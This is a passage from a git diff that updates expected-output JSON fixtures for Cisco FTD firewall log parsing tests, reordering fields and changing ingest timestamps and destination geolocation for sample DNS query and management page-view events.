-0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1393,15 +1333,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1440,7 +1380,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913005400Z", + "ingested": "2021-12-14T14:39:57.642432006Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1505,37 +1445,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "refusedthis.com", - "type": "A" - }, - "response_code": "REFUSED" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 75, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "refusedthis.com", + "type": "A" + }, + "response_code": "REFUSED" }, "source": { "address": "10.0.1.20", @@ -1544,15 +1478,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1591,7 +1525,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913011300Z", + "ingested": "2021-12-14T14:39:57.642432432Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", @@ -1654,33 +1588,27 @@ "log": { "level": "alert" }, + "dns": { + "response_code": "SERVFAIL" + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 313, - "ip": "81.2.69.144", - "packets": 4 - }, - "dns": { - "response_code": "SERVFAIL" + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -1689,15 +1617,15 @@ "packets": 6, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "tcp", "application": "dns client", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1736,7 +1664,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913017500Z", + "ingested": "2021-12-14T14:39:57.642433022Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", @@ -1797,37 +1725,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "laskdfjlaksdf.elastic.co", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 180, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "laskdfjlaksdf.elastic.co", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -1836,15 +1758,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1883,7 +1805,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913025600Z", + "ingested": "2021-12-14T14:39:57.642433418Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", @@ -1947,37 +1869,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "ns-1168.awsdns-18.org", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 108, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "ns-1168.awsdns-18.org", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1986,15 +1902,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2033,7 +1949,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913029600Z", + "ingested": "2021-12-14T14:39:57.642433804Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", @@ -2096,37 +2012,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "_http._tcp.security.ubuntu.com", - "type": "SRV" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 162, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "_http._tcp.security.ubuntu.com", + "type": "SRV" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -2135,15 +2045,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2182,7 +2092,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913034500Z", + "ingested": "2021-12-14T14:39:57.642434185Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", @@ -2246,37 +2156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2285,15 +2189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2332,7 +2236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913040500Z", + "ingested": "2021-12-14T14:39:57.642434568Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -2397,37 +2301,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2436,15 +2334,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2483,7 +2381,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913045Z", + "ingested": "2021-12-14T14:39:57.642435067Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2546,37 +2444,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2585,15 +2477,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2632,7 +2524,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913049600Z", + "ingested": "2021-12-14T14:39:57.642445031Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2695,37 +2587,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2734,15 +2620,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2781,7 +2667,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913053300Z", + "ingested": "2021-12-14T14:39:57.642445517Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", @@ -2844,36 +2730,30 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "type": "PTR" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 131, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "type": "PTR" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2882,15 +2762,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2929,7 +2809,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913058Z", + "ingested": "2021-12-14T14:39:57.642447079Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", @@ -2991,37 +2871,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -3030,15 +2904,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -3077,7 +2951,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913064400Z", + "ingested": "2021-12-14T14:39:57.642447489Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index 4253c442cad..50bd113558a 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2019-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" @@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.406347800Z", + "ingested": "2021-12-14T14:40:02.331746143Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:35:07.406356100Z", + "ingested": "2021-12-14T14:40:02.331749335Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json index 01f60058c6a..dc7c6c06f01 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json @@ -1,1257 +1,1254 @@ { "expected": [ { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:56:30.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581578300Z", + "ingested": "2021-12-14T14:40:02.507004545Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581586900Z", + "ingested": "2021-12-14T14:40:02.507007023Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ChangeReconciliation.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ChangeReconciliation.cgi" + }, "@timestamp": "2019-08-14T13:57:26.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581591600Z", + "ingested": "2021-12-14T14:40:02.507007517Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:34.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581595700Z", + "ingested": "2021-12-14T14:40:02.507007909Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { 